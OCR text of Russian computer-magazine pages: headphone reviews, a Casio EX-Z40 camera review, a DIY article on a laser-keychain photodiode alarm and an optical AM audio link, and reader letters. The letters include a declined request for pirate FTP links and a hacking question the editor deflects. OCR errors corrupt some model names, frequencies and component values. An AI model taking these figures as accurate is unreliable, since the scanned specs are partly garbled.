Частотный диапазон: 18-22000 Гц 

Искажения: <0.2% 

Сопротивление: 64 Ом 

Чувствительность: 102 gB 

Регуляторы: отсутствуют 

Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 MM 
Вес: 210 г 


Очень приятные по ощущениям наушники (велюровые амбушюры и мягкая легкая дужка сохраняют чувство комфорта 
BY даже при использовании очень продолжительное время) полностью охватывают ухо, HO по конструкции являются OTK- 
рытыми (то есть полной изоляции от внешнего мира нет). Благодаря расширенному динамическому диапазону (особенно под- 
нятой верхней границе) система наиболее подходит для прослушивания симфонических композиций (что и отражено в назва- 
нии - "Symphony"). Из-за особенностей конструкции (открытая система, со специальными облегченными катушками и усилен- 
ными магнитами) бас звучит более мягко, нежели у предыдущей модели того же производителя, а высокие частоты в некото- 
рых случаях становятся настолько пронзительными, что приходится специально занижать их в эквалайзере. 
Съемный трехметровый кабель из бескислородной меди удобен тем, что является съемным (конец, подключающийся к науш- 
никам, имеет стандартный разъем MiniJack 2.5 мм), а само соединение происходит лишь с одной стороны. Высокое сопротивле- 
ние не позволяет использовать хэдероны совместно с переносной техникой (MP3- или CD-nneepom), поскольку громкости в 
сильно зашумленном месте будет не хватать из-за малой мощности усилителя. 


АКС К240 
ВЕЕТ ee | 


Тип: полуоткрытые мониторные, Circumaural 
Частотный диапазон: 15-20000 Гц 

Искажения: <0.25% 

Сопротивление: 600 Ом 

Чувствительность: 88 gb 

Регуляторы: саморегулирующаяся дужка 
Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Вес: 240 г 


Эта система относится к классу высококачественной Н-Е аппаратуры, причем классическая конструкция обеспечивает 

наиболее чистое звучание - примененные мощные магниты дают жесткий бас, а активная диафрагма призвана 
улучшить качество звука. Систему не удастся использовать без дополнительного усилителя с обыкновенным плеером или 
компьютером, поскольку сопротивление наушников весьма большое, но они на это и не рассчитаны, ведь область 
использования AKG К240 обозначается как профессиональная. 
Большие, охватывающие уши амбушюры сделаны с расчетом на длительное использование, и действительно - после 
прослушивания музыки в течение полутора часов никаких болезненных ощущений не возникло. Самоподстраивающаяся 
дужка помогает наиболее оптимально закрепить наушники на голове, однако надежность такого крепления очень невысокая. 
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(И Нео смузыкойпо жизни ) 


АКС K66 / 
ЕЕ ТЕСЕН 


Тип: полуоткрытые мониторные, Circumaural 
Частотный диапазон: 18-22000 Гц 

Искажения: <1% 

Сопротивление: 32 Ом 

Чувствительность: 96 gb 

Регуляторы: автоподстройка высоты дужки 
Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Вес: 210 г 


Неплохой вариант наушников бюджетного класса. Свою стоимость система отрабатывает сполна, воспроизводя доста- 

точно чистый и вместе с тем сочный звук. Сказать, что это - акустика высшего класса, нельзя, однако она является не 
самым худшим образцом. Нам показалась не совсем удобной система с самонастраивающейся дужкой, поскольку устойчи- 
BOCTb на голове в этом случае весьма слабая и при резких поворотах вся конструкция сваливается. Что касается физических 
ощущениях при прослушивании, то из-за слабой дужки давление на уши минимальное и с наушниками можно работать дос- 
таточно продолжительное время, а полуоткрытые амбушюры способствуют проветриванию околоушного пространства. Низ- 
кое сопротивление способствует применению AKG K66 совместно с мапомощной аппаратурой (вроде карманного плеера), но 
при сильной зашумленности внешней среды получить удовольствие от музыки не получится (все-таки система не полностью 


изолирует от окружающего мира). 


NADY ОН 660 
SSS SSS 


Тип: закрытые мониторные, Circumaural 
Частотный диапазон: 20-20000 Гц 
Искажения: N/A 

Сопротивление: 32 Ом 
Чувствительность: 107 gb 

Регуляторы: поворотные амбушюры 


Длина кабеля: 2.9 м é 
Штепсель: MiniJack (3.5 мм) + адаптер Ha 6.3 мм <=, 
Bec: N/A a 


Наушники более всего призваны стать спутником ди-джея, поскольку имеется весьма удобная CpYHKLIMA разворота 

амбушюр на 90 градусов, что позволяет осуществлять мониторинг музыки. Мягкий велюровый материал амбушюр 
обеспечивает комфортную работу весьма долгое время. Конструкция системы такова, что на голове наушники крепятся 
прочно и надежно, а шарнирный подвес динамиков дает наиболее удобное обпегание ушной раковины. При настройке длины 
дужка системы кажется хлипкой (узлы крепления имеют значительный люфт) и в экстремальных условиях она может 
отломиться. По звучанию же это действительно неплохая система, с мягким сочным басом (который обеспечивается мощными 
неодимовыми магнитами) и чистыми высокими частотами, однако для проффессионального применения может не хватить 


м 


динамического диапазона. 


NADY ОН 360 
SS 


Тип: открытые мониторные, Circumaural 
Частотный диапазон: 20-22000 Гц 

Искажения: N/A 

Сопротивление: 64 Ом 

Чувствительность: 106 9Б 

Регуляторы: дужка с функцией автонастройки 
Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Bec: N/A 


Конструкция наушников (мягкие приятные амбушюры, широкая лента дужки с автонастройкой длины) обеспечивает их 
удобную и прочную посадку на голове, и использовать систему можно сколь угодно долгое время без накопления 
усталости в области ушной раковины. Созданные для применения совместно с качественными источниками цифрового звука, 
динамики наушников прекрасно воспроизводят низкие частоты, на высоких же инструментах качество также остается весьма 
неплохим. А хорошая чувствительность обеспечивает воспроизведение громкого мощного звука. Открытое устройство 

наушников обеспечивает естественность и комфортность прослушивания музыки. 


ВЫВОДЫ 


Протестировав двенадцать пар наушников, мы Первая - Sony MDR 7506 - показала наивысшее 
сделали единственный вывод: сначала стоит оп- качество звука и удобное крепление на голове, и 
ределиться с областью применения системы, а пе- именно этим наушникам отдается награба "Выбор 
ред покупкой акустического устройства нужно редакции". Вторая же - Sennheiser HD 212 Pro - 
обязательно послушать и проверить его на себе, также очень удобна в использовании и обладает 
чтобы избежать проблем в дальнейшем. Среди очень чистым и приятным звучанием, поэтому 
всех сегодняшних систем стоит выделить две. для нее остается награда "Лучшая покупка". 
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Александр Иванов, test_lab (test_lab@gameland.ru) 


УЛЬТРАКОМПАКТНЫЙ 
ФОТОАППАРАТ 
CASIO ЕХ-240 _— 
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амеры класса “ком- 
пакт”, как правило, яв- 
ляются модным аксес- 
суаром, поэтому им 
просто необходимо 
выглядеть стильно, не обременять 
карманы владельца большим весом и 
габаритами и иметь при этом сносное 
качество изображения. Сегодня мы 
представляем твоему вниманию ми- 
ниатюрную цифровую камеру Casio 
Exilim EX-Z40 с 4-мегапиксельной 
матрицей. Поклонники тотальной ми- 
ниатюризации будут обрадованы тем, 
что в таком малюсеньком корпусе 
уместились еще и видеокамера, спо- 
собная создавать короткие ролики со 
звуком, и цифровой диктофон. 


УСТРОЙСТВО 

Несмотря на малые габариты ка- 
мера имеет все атрибуты, присущие 
полноразмерным фотособратьям. В 
наличии З-кратный ХООМ-объектив 
производства Pentax, матрица высо- 
кого разрешения и возможность 
ручного управления большинством 
съемочных параметров. Интересна 
комплектация: устройство поставля- 
ется на рынок не “голышом”, а вмес- 
те с удобной док-станцией. Именно 
через нее осуществляется зарядка 
аккумулятора и перекачка сфотогра- 
фий в компьютер. Наличие подобно- 
го кредла освобождает пользовате- 
ля от необходимости возиться с веч- 
но падающими под стол проводами и 
отдельными зарядными устройства- 
ми: просто поставил камеру в гнездо 
- и готово! Другим преимуществом 
кредла является его устойчивость к 
механическим воздействиям: воткну- 
тый в камеру кабель можно слегка 
дернуть и повредить разъем, ас 
плотно сидящей в док-станции каме- 
рой такого не произойдет. 
При первом же опыте работы с Casio 
EX-Z40 приятно удивляет полная и 
качественная русификация всех 
пунктов меню управления. Его струк- 
тура и логика управления также дос- 
таточно продуманны, режимы работы 
вспышки, диапазоны фокусировки, 
баланс белого могут быть изменены 


вручную, даже если 
выбрана одна из 
сюжетных прог- 
рамм. 
Традиционным 
недостатком не- 
зеркальных 


цифровых ‹ро- 

тоаппаратов . 

принято счи- — -- 
тать низкую 

скорость ра- 

боты. Редко . ы 
когда удает- 


ся заснять 
зевающего за со- 

седней партой сокурсни- 

ка: камеру нужно включить, 
подождать, пока объектив наведет- 
ся на резкость и сам кадр будет не- 
посредственно снят. В Casio EX-Z40 
решена одна из этих проблем - вдо- 
бавок к обычным режимам приду- 
ман режим “панорамного автофоку- 
са". Хитрость заключается в том, 
что камере не надо долго и тща- 
тельно определять расстояние go 
объекта, так как автоматика пример- 
но оценивает дистанцию, грубо cpo- 
кусируется и прикрывает диафраг- 
му, тем самым выставляя большую 
глубину резкости. В итоге, довольно 
резкий снимок получается намного 
быстрее. 


КАЧЕСТВО СНИМКОВ 

Мы сделали несколько съемоч- 
ных серий, что бы иметь представ- 
ление о том, насколько хорошо ра- 
ботает этот фотоаппарат. Благода- 
ря чувствительности матрицы в 50 
единиц ночные кадры получаются 
весьма малошумными, а возмож- 
ность ручного выставления баланса 
белого помогает справиться с осве- 
щением ночного города разными по 
цветовой температуре светильника- 
ми. Макросъемка тоже на высоте, 
максимальное увеличение таково, 
что обыкновенный спичечный коро- 
бок не умещается в кадр. Уверен- 
ная работа автоматического балан- 
са белого в дневное время, сочета- 
ющаяся с хорошей цветопередачей, 


делает эту камеру пригодной для 
съемок на природе. 


ВЫВОДЫ 

Знаток в деле создания ультра- 
компактных камер, компания Casio в 
очередной раз порадовала своих по- 
купателей. Фотоаппарат Casio ЕХ- 
240 обладает малыми размерами и 
весом, места в кармане занимает не 
более чем колода игральных карт, но 
при этом фотоснимки, полученные с 
его помощью, радуют глаз чет- 
костью, низкой зернистостью и ярки- 
ми цветами. 57 


Casio ЕХ-240 ($397) 
Светочувствительная матрица: CCD, 1/2,5 дюйма. 4.0 MPix 
Максимальное разрешение, px: 2304x1728 


Фокусное расстояние объектива, мм: 5,8-17,4 (35-105 в 35-мм 
эквиваленте) 


Апертура: F2.6/F 4.3 
Выдержка: 1/2000-4 с 
Чувствительность матрицы, ISO: 50, 100, 200, 400 


Встроенная память, Мб: 9.7 


Используемые карты памяти: SD/MMC 


Формат файлов: JPEG (EXIF) - изображения, MJPEG - ролики 


Видоискатель: оптический, 3x Zoom 
ЖК-дисплей: ТЕТ 2.0", 84960 пикселей 
Интерфейсы: USB 


Габариты (ДхШхВ), мм: 87x57x23 (со споженным объективом) 
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NeO1eX (NeOleX@rambler.ru, www.alexhak.na 
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ПАЯЛЬНИК 


СО СКОРОСТЬЮ СВЕТА 


т ебе, наверное, знакома ситуация: друзья, обломавшись войти в подъезд, с радостным видом спешат известить 
о своем приходе, кинув что-нибудь тяжелое типа кирпича тебе в окно. Устал менять стеклопакеты? 
Тогда это статья для тебя! 


ДО ТОГО КАК 


Согласно второму 


закону Ньютона, уско- 


рение, приобретаемое 
телом, прямо пропорци- 
онально силе, действующей на него. 
Прочность оконного стекла напрямую 
зависит от его толщины. Кинетичес- 
кую энергию кирпича, брошенного 
другом, рассчитать, в принципе, мож- 
но, но придется принять во внимание 
количество выпитого другом пива. К 
сожалению, эта величина зачастую не 
является константой, а это значит, что 
придется считать, используя некото- 
рые законы из теории вероятности. 
Что, уже взял в руки калькулятор? Не 
стоит, возьми лучше паяльник: счи- 
тать - удел ботанов, а не жестянщи- 
ков, и потому будем решать эту проб- 
лему более радикальным способом - 
сделаем дистанционный мегазвонок. 
И радикалом будет обыкновенный 
псевдолазерный брелок. А называет- 
ся он так потому, что внутри его не что 
иное, как китайское подобие полупро- 
водникового лазера - этакий гипербо- 
лоид инженера Гарина ХХ века. 
Открою большой секрет товарища 
Н.Г. Басова: в лазерах любого типа 
(рубиновом, газовом, полупроводни- 
KOBOM И Т.0.) нет никакого намека на 
линзы (в источнике - да, но ничто не 
мешает поставить оптическую систе- 
му на выходе лазера - прим. 
AvaLANche'a), потому как последние 
преломляют свет, а по теории (и на 
практике тоже) лазер должен обеспе- 
чивать параллельное и однонаправ- 
ленное когерентное излучение. Коро- 
че, лажа это все... Но эту лажу за неи- 
мением какой-либо другой на придет- 
ся использовать. Применений ей мно- 
жество, и Спец уже писал об этом. 


Плата, на которой все закреплено 


Теплоотвод 


Светодиод повышенной яркости, используемый в нештатном 


режиме 


Втулка-держатель с резьбой 


Пружина, прижимающая линзу к втулке 


Линза 


а В 


Втулка, регулирующая фокусировку линзы 
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ХАКЕРСПЕЦ 


По теории лазер должен обеспечивать 


параллельное иоднонаправленное 
когерентЕое излучение. 


КЕНТАТОР 

Схему этого нехитрого девайса 
ты можешь увидеть на рис. 2. В нем 
всего четыре детали. Сам девайс 
представляет собой qpotopene. Са- 
мой главной деталью в нашем реле 
является фотодиод. Фотодиод отли- 
чается от обычного диода тем, что 
начинает проводить ток, только ког- 
да освещен. Тогда он открывается, 
но по-прежнему проводит ток лишь 
в одном направлении. Этим свой- 
ством мы и воспользуемся. Когда мы 
наводим луч нашего брелока на cCpo- 
тодиод VDI, он открывается, через 
резистор RI начинает протекать ток, 
срабатывает ключ на транзисторе 
\ТТ, что приводит к появлению логи- 
ческой 1 на коллекторе этого тран- 
зистора. Уровень этой единички мы 
можем регулировать резистором R2. 
Этот же резистор задает рабочую 
точку для транзистора \Т1. Резистор 
R1 служит для ограничения тока, и, 
меняя его сопротивление, можно 
тем самым регулировать уровень 
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срабатывания реле. Это необходимо 
для точной настойки, дабы реле не 
срабатывало само в результате из- 
менения солнечной активности. 

Итак, у нас есть реле, которое выда- 
ет логическую 1 при наведении на не- 
го луча брелока. Это уже само по себе 
неплохо, но практической пользы от 
этой единички чистый ноль. А если 
подключить наш девайс, скажем, к 
LPT1 порту на какой-либо разряд ши- 
ны данных и написать утилиту, кото- 
рая бы опрашивала этот порт и при 
появлении "1" сигнализировала бы об 
этом звуковым сигналом? Это уже 
лучше. Но мы же, блин, жестянщики - 
зачем нам писать какие-то утилиты, 
когда можно решить проблему, ис- 
пользуя горячий паяльник? 

На рис. 3 представлено решение 
этой проблемы. Это устройство назы- 
вается ждущим мультивибратором. 
Рассмотрим его работу подробней. 
Когда на входе, коим является база 
транзистора VT1, подан "О", транзис- 
тор открыт и на входе элемента 2И- 
НЕ 0014 также сигнал с нулевым ло- 
гическим уровнем. Как только появ- 
ляется сигнал "1", транзистор закры- 
вается, что является благоприятным 
фактором для возникновения коле- 
баний. В нашем случае частота коле- 
баний равна1 кГц, но ее можно по- 
менять, изменив соответствующие 
номиналы R3 и С1. Даже если ты не 
меломан, то все равно просто обязан 
знать, что человеческое ухо воспри- 
нимает колебания в диапазоне от 20 
Гц 9020 кГц (в идеале). Самый пик 
чувствительности этого уха как раз 
приходится на частоту 1 кГц. И изда- 
ет эти колебания не что иное, как пь- 
езоэлектрический излучатель 201. 
Конечно, можно было бы использо- 
вать и динамическую головку, но в 
нашем случае это ни к чему, потому 
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как не оркестровые партитуры восп- 
роизводим. Да и пьезоэлектрический 
излучатель более заточен под моно- 
тонный сигнал, чем головка. К тому 
же, он меньше по размерам. Ты уже, 
наверное, догадался, что резистор RI 
задает рабочую точку для транзисто- 
ра \ТТ, а резистор R2 ограничивает 
ток, поступающий на базу. Кстати, те- 
бе интересно, почему 701 так странно 
включен? Все просто: на него прихо- 
дят сигналы в противофазе, а это 
значит, что амплитуда сигнала (гром- 
кость то бишь) гораздо больше. 

Ты уже далеко не новичок в этом 
вопросе, и мне просто неудобно заво- 
дить разговоры о применяемых в де- 
вайсе деталях. Но позволь все же па- 
ру байт. В устройстве применены 
обычные резисторы МЛТ-0.125, вмес- 
то которых, разумеется, можно поста- 
вить любые, удовлетворяющие cpop- 
муле Мощность/Сопротивление/Габа- 
риты (рис. 4), например, MOH-O,125. 


Единственный конденсатор в кен- 
таторе может быть любым (даже 
бескорпусным), но я все же поста- 
вил наш - проверенный временем 
"флажок" (рис. 5). Одно требование 
- емкость 1 нФ. Микросхему 901 
K561N1A7, что на рис. 6, ты должен 
был увидеть в августовском номере, 
но если почему-то не увидел, то 
посмотри еще раз. Используемый в 
девайсе фотодиод - половинка 
сборки (не путать с оптопарой!), 
представленной на рис. 7. Такие 
сборки из двух фотодиодов есть в 
любых мышах (по три штуки на 
мышь). Так как такие пары имеют 
значительный разброс по парамет- 
рам и дабы не иметь никаких проб- 
лем, используется только один фо- 
тодиод пары. Хотя, в принципе, мож- 
но применить любой фотодиод, ра- 
ботающий в инфракрасном-красном 
диапазоне. п-р-п транзистор - KT315 
с любым буквенным индексом. Так- 
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же можно использовать без ограни- 
чений транзисторы серии KT3102. 


ТЕЛЕФОН, ТЕЛЕГРАФ... 

В век бурного развития интернета 
и П-технологий вообще все мы подза- 
были о модном в свое время господине 
- Герце, который как-то раз выпил 
меньше всех и открыл явление распро- 
странения электричества в простран- 
стве. Да ио нашем соотечественнике - 
изобретателе радио AnekcaHgpe Степа- 
новиче Попове мы вспоминаем разве 
что 5 мая. Благодаря им мы теперь зна- 
ем, что световая волна и радиоволна, 
по сути, одно и то же - электрические 
колебания, распространяющиеся в 
пространстве, только световые имеют 
более высокую частоту, чем привыч- 
ные радиоволны. А раз так, то нельзя 
ли их использовать в свое удоволь- 
ствие? Можно! Световую волну можно, 
например, промодулировать звуком и 
передавать тем самым данные без про- 
водов. Вот этим и займемся. 

На рис. 9 представлена схема тако- 
го передатчика, работающего в све- 
товом диапазоне частот и позволяю- 
щего получить амплитудно-модули- 
рованный сигнал. Резистором RI! за- 
дается необходимый ток для усилите- 
ля, встроенного в электретный микро- 
орон BMI. Каскад на транзисторе \Т1 - 
не что иное, как классический усили- 
тель звуковой частоты, в который по- 
мимо транзистора входят резисторы 
R2, КЗ, РА. Сигнал с микрофона пос- 
тупает через разделительный кон- 
денсатор С1 (который отсекает посто- 
янную составляющую) на базу этого 
транзистора. Подбором резистора К2 
можно задать коофициент усиления 
каскада. В принципе, ничего подби- 
рать не надо, потому оставим его с 
таким сопротивлением, какое указано 
на схеме. Далее усиленный сигнал 
поступает на базу транзистора \Т2. 
Этот каскад выполнен на более мощ- 
ном транзисторе, ведь его нагрузкой 
является наш брелок, а он, как изве- 
CTHO, тока потребляет немеряно. (Ес- 
ли есть желание, изомерь: включи в 
разрыв между напряжением питания 
и катодом светодиода амперметр, по- 
том мне расскажешь :-).) Брелок-то и 
испускает амплитудно-модулирован- 
ные световые импульсы. 

Но передать импульсы - это полде- 
ла, нам необходимо их еще и при- 
нять. Ты можешь предположить, что 
приемником будет половинка нашего 
кентатора, и будешь совершенно... 
неправ. А неправ потому, что кента- 
тор способен улавливать лишь им- 
пульсы, а нам необходим приемник, 
который может переварить АМ-сиг- 
нал. Этим приемником будет устрой- 
ство, показанное на рис. 10. 

Передаваемый нашим передачиком 
АМ-сигнал принимается таким же ‹ро- 
тодиодом, что использовался в кента- 
торе. Далее, через разделительный 
конденсатор Cl, он подается на базу 
транзистора \Т1, который вместе с ре- 


оффтопик 


4 
= 
= 
о 
= 
8 
8 
о 


GEM HARD | пляльчик )) 
в = - - 
ao Wc a 
| ree) Г 
i 
Е + 


зисторами R1 uv R2 образует каскад 
предварительного усиления. Но мощ- 
ности сигнала, снимаемого с эммитера 
этого транзистора, недостаточно даже 
для наушников. Поэтому нам необхо- 
дим дополнительный усилитель звуко- 
вой частоты, коим и является уже из- 
вестная по предыдущей статье микрос- 
хема DAI TDA7052 (рис. 1). Конденса- 
тор C2 так же, как и Cl, - разделитель- 
ный. Динамическая головка BAI может 
быть любой с сопротивлением катушки 
4 или 8 Ом и развиваемой мощностью 
0,25-0,5 ВТ. Я, например, поставил 1- 
ГД12, что показана на рис. 14. 

Коль я заговорил о деталях, то поз- 
вольте по порядку. Все резисторы 
(как на рис. 9, так и на рис. 10) по- 
прежнему могут быть любыми, но 
мощностью не менее 0125 Вт. Цоко- 
левка примененных мною транзисто- 
ров приведена на рис. 12, но возмож- 
ны отходы от схемы. Вместо транзис- 
тора VT1 на схеме рис. 9 может ис- 
пользоваться транзистор с любым 
буквенным индексом как КТЗ15, так и 
KT3102. Вместо транзистора \Т2 
KT815 можно использовать транзис- 
Top КТ817 также с любым буквенным 
индексом. Вполне возможно исполь- 
зовать более мощный транзистор 
КТ819, в этом случае можно запарал- 
лелить три кристалла брелока, соот- 
ветственно увеличив дальность уве- 
ренной связи go 250-300 метров 
вместо 70-100 метров, которые дости- 
гаются с одним. Меньшие значения 
приведены при дневных эксперимен- 
тах, а большие - при ночных (конеч- 
но же, можно было подобрать более 
чувствительный фотодиод, работаю- 
щий в более узком диапазоне, и полу- 
чить уверенную связь на больших 
расстояниях, но, если честно, передо 
мной такая задача не стояла). В схе- 
ме, что на рис. 10, вместо транзистора 
KT361 (его цоколевка - на рис. 12), 
можно с успехом применить KT3107. 
Конденсаторы - наши "сфлажки" или 
импортные фирмы TREC (не сочти за 
рекламу - просто фирма TREC являет- 
ся практически монополистом на ми- 
ровом рынке, имея филиалы по всему 
миру; единственным ее конкурентом я 
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считаю только отечественную про- 
мышленность, которую фирма ТКЕС 
пока собой не запятнала). 

О микросфроне. Он, как уже известно, 
должен быть электретным со встроен- 
ным усилителем. В принципе, в насто- 
ящее время производится несколько 
типов электретных микрофонов, но 
удовлетворят нас далеко не все. 
Вполне пригоден отечественный 
электретный микрофон типа MK3-3. 
Во-первых, он имеет в своем составе 
микросхему вместо полевого транзис- 
тора и резистора, что дает нам боль- 
шее усиление. Во-вторых, конструк- 
ция микросфона такова, что мы можем 
без проблем использовать его как су- 
губо направленный девайс. А это зна- 
чит, что нам не нужно приближать его 
ко рту - он вполне способен уловить 


малейший звук на расстоянии одного- 
полутора метров. Про цену микробро- 
на вообще говорить смешно - копей- 
ки. Его ближайшим аналогом являет- 
ся профессиональный MUKPOCDOH 
"Сосна". В общем, причин gna его ис- 
пользования достаточно. Но просто 
так (как, например, угольный микро- 
орон) его не подключишь - вывода-то 
три. Решить проблему подключения 
тебе поможет срото на рис. 15. У этого 
типа микросронов выводы всегда 
цветные, а цвета стандартизированы. 
Так, красный цвет соответствует плю- 
су питания, синий - общему проводу, 
белый - выходу звукового сигнала. 
Но, пожалуй, только в отечественной 
промышленности возможны отходы 
от стандартов. Я встречал вместо 
красного - розовый, вместо белого - 


желтый, а вместо синего - коричне- 
вый. Вроде ничего страшного, но все 
же, если продавец попытается всу- 
чить тебе микрофон с нестандартной 
цветовой раскладкой, то требуй у не- 
го посмотреть коробку - на ней нари- 
сована правильная распайка. 


ИЗГОТОВЛЕНИЕ 

Вот я тебе рассказал много всего, 
схем кучу накидал, а как воплотить 
это все в железе - не объяснил. Не 
проводками же все между собой свя- 
зывать. Что мы - дети малые? Ты уже 
знаешь, как изготавливать платы, ис- 
пользуя фабричные заготовки. Ты 
уже знаешь, как изготавливать печат- 
ники, используя царапалку. Сейчас я 
познакомлю тебя еще с одним спосо- 
бом. Он чрезвычайно прост, и за прос- 
тоту свою причислен к разряду клас- 
сики. Но для этого нам понадобятся 
заготовки печатных плат размерами 
55x30, 45х30 и 20x50 соответственно 
для схем, что на рис. 2 и 3 (они объе- 
динены в одно устройство, а если ты 


решил писать программу, которая бы 
опрашивала какой-либо порт компа 
(аппаратный, разумеется), то тебе 
придется и плату перерабатывать са- 
мостоятельно), рис. 9 и 10. Помимо 
срольгированных стеклотекстолито- 
вых заготовок тебе потребуются со- 
ответствующие им чертежи в масш- 
табе 1:1. Они даны на рис. 16, 17 и 18 со- 
ответственно (на диске к журналу ты 
их тоже найдешь). 

Итак, кернишь и сверлишь заготов- 
ки, используя соответствующие им 
чертежи как шаблоны. Обезжирива- 
ешь растворителем. Ты это уже де- 
лал, потому не повторяюсь. Далее бе- 
решь купленный заранее цапонлак 
(рис. 19) и - на выбор - либо медици- 
нский многоразовый шприц (потому 
как одноразовый лак разъедает, и он 
начинает самопроизвольно вытекать 
со стороны поршня) либо рейсфедер 
(как его изготовить, написано в пер- 
вой статье). В качестве исключения 
они оба даны на рис. 20. С тех пор как 
у меня появился рейсфедер, шприц 
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Puc. 25. Внешний вид АМ-приемника. 
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меня уже не удовлетворяет... Поэтому 
ты не видишь на фото, прилагающей- 
ся к шприцу, иглы. Если ты решил ис- 
пользовать шприц, то тебе нужно бу- 
дет сточить (не откусить!) ребром Hag- 
филя иглу под прямым углом go 1,5-2 
см 90 основания (при прямом угле от- 
верстие в игле минимально, а значит, 
рисунок получится более красивым). 

Далее берем рейсфедер, всасываем 
немного цапонлака (можно ноздрей :- 
)) и, используя слесарную линейку, 
рисуем дорожки согласно чертежам. 
Небольшой комментарий: 

©. Рисуй четко и быстро, не позво- 
NAA лаку засыхать на конце рейсоре- 
дера. Если возникла пауза, сразу за- 
совывай рейссфредер в колпачок с 
растворителем. 

©. Дабы не смазывать нарисован- 
ное линейкой, плату желательно за- 
фиксировать между двух плоских, 
равных по высоте предметов и линей- 
ку держать на них. 

©. Можно, конечно, линейкой пре- 
небречь, но 99%, что плата получится 
корявой. 

Ну вот, ты получил предохрани- 
тельный рисунок на плате. Теперь 
берешь порошковое хлорное желе- 
зо (рис. 21), растворяешь его в горя- 
чей воде и выливаешь раствор в не- 
металлическую кювету. Этот про- 
цесс показан на рис. 22. Затем су- 
ешь туда заготовку, которую ты дол- 
жен предварительно привязать за 
нитку. Кстати, перчатки не забудь. 
Затем, смотря периодически на заго- 
товку, наблюдаешь за процессом 
травления. После того как не оста- 
нется следов ненужной нам меди на 
стеклотекстолите, суешь получен- 
ную плату под струю воды. Теорети- 
чески цапонлак должен сойти почти 
полностью, но, если этого не прои- 
зошло, смывай его тряпкой, смочен- 
ной водой наполовину с растворите- 
лем (так его испаряется меньше). 
Следующий этап - покрытие фольги- 
рованной поверхности канифоль- 
ным лаком. Делать это нужно сразу, 
не катая вату, ибо дорожки могут 
окислиться, и тогда без проблем к 
ним не припаяешь. И только потом 
паяешь согласно тем же чертежам. 
То, что у меня получилось, предс- 
тавлено на рис. 23, 24, 25. Не удов- 
летворяйся достигнутым, старайся 
сделать лучше! 


ТНЕ КОНЕЦ 

m Надеюсь, тебе не нужно наме- 
кать, что при надлежащей сообрази- 
тельности ты сможешь с успехом пе- 
редавать и цифровые данные? По 
крайней мере, информации из статьи 
тебе должно хватить. Хочу добавить, 
что если хочешь большой скорости, 
то нужно использовать более быст- 
родействующие транзисторы. Так, 
например, для получения скорости в 
10 Мбит верхняя граничная частота 
транзисторов должна быть как мини- 


мум 1,5 ГГц. 


Рис. 19. Цапонлак 
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Рис. 22. Травим 
плату 
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На письма отвечал Dr.Klouniz 


(spec@real.xakep.ru) 


FROM: ВАЛЕРИЙ ДОБРОСКОКИН [CRZ_DOBERMANN@MAIL.RU] 


SUBJECT: МЕНЯ ОЧЕНЬ ИНТЕРЕСУЮТ ССЫЛКИ HA FTP-CEPBEPA 


Здравствуйте, уважаемый Спецвыпуск "Хакер"! Меня очень интересуют ссылки на ЕТР-сервер для скачивания фильмов, а также для свежего 

(относительно свежего) шареза ;)... Конечно, я понимаю, что чем больше людей знает эти VIP-agpeca, тем больше будет народу, и в итоге FTP 
этот прикроют или попросят качать за бабки :(. Я обещаю, что полученные от вас данные будут только у меня в голове и никто другой их не узнает! А 
еще я хотел поблагодорить вас за ваш прекрасний журнал! Хотя он достаточно дорого мне обходится, но он того стоит :). Желаю вам, чтобы вы могли 
почаще радовать нас, горе-читателей, своей (как у вас там говорят) рулезной инфой :). Процветайте и развивайтсь дальше! 


ОТВЕТ: 


Письмо это было написано изначально Ha полнейшем транслите и было приведено мной с помощью WwWw.translit.ru и 
проверки орфографии MS Word'a в нормальный вид. Слава производителям этих продуктов :). Кстати, как говорит то- 
варищь Бубл из X, «na translite pishut toko kidaly». Благодарности мы твои, конечно же, с удовольствием примем по 
WM... тьфу, похоже, мне хватит общаться с Бублом. Итого: никаких ссылок мы тебе не дадим. Вообще-то аккаунт на хо- 
роший ЕТР еще заслужить надо, а лишиться его проще простого: попытаться качать осликом, качать в несколько по- 
токов или нарушать другие правила держателя заведения. Так что сам понимаешь :). 


FROM: DIMA DIMA [DIMA-W@BOX.AZ] 


SUBJECT: 


FROM: OT ВАЛЕНТИНА [ZVALENTIN@MTU-NET.RU] 
SUBJECT: АТАКА ЧЕРЕЗ ПОРТ 


Я, как начинающий провайдер, не знаю значений некоторых 

слов, прошу прояснить: хостинг, статические и динамические 
IP, провайдеры clobal one, интерфейс, 128-килобитный линк, аккаунт, 
билинг, концентратор, девайс, ЕТР-архив, рацтеры, хаб. 


ОТВЕТ: 

Сложный вопрос, на самом деле. Вообще-то я не 
очень разбираюсь в древних языках, но вот мой боль- 
шой друг Horrific 3a время работы в Hack FAQ в них nog- 
наторел изрядно. Вот он-то и объяснил мне, что каждое 
такое слово в отдельности смысла не имеет, но все в 
сумме они означают древнеегипетское ругательство, ко- 
торое жрецы адресовали своим нерадивым ученикам, 
не желающим читать древние папирусы и изучать Hag- 
писи на пирамидах. Оно переводится так: «Читай доки, 
сын мой, a TO я набью твою голову ароматными травами 
и выкину ее в Нил, чтобы удобрить папирус». Прошло 
много веков, а смысл этих слов так и не изменился. 
Только теперь достаточно набить интересное слово в 
поисковик и нет смысла по жаре изучать иероглифы на 
пирамидах :). 


FROM: NIKOLA [NIKOLA@ATKNET.RU] 


SUBJECT: 


Здравствуйте, уважаемый spec! По вашему совету я зашел Ha 

сайт www.nsd.ru/hack.php и скачал там прогу IP Tools. Прошу объ- 
яснить начинающему хаку, как взломать комп после сканирования пор- 
тов :). Пробовал в локальной сетке. Помогите мне, плиз, очень прошу! 


ОТВЕТ: 

А зачем его ломать-то? Само по себе сканирование 
портов - это уже большое удовольствие. Вот прос- 
канишь компьютер другана по локале, а у него фа- 
ервол стоит, КАН, скажем. Узрит он окошко: «Ваш 
компьютер был атакован с адреса ХХХ атакой «ска- 
нирование портов»!!! Атака отражена!». Юзер nopa- 
дуется, как он круто справился с хакером и запостит 
в форум локалы: «Какой <censored> с такого-то ай- 
пишника меня атакует? Я ведь не ламер, а его за- 
баньте» :). Клоню я к тому, чтобы ты просто внима- 
тельно читал «Взлом» Хакера и сам Спец (сейчас мы 
делаем выпуск «Атака Ha Windows», думаю, он тебе 
будет суперполезен), а в одном ответе я тебе всю 
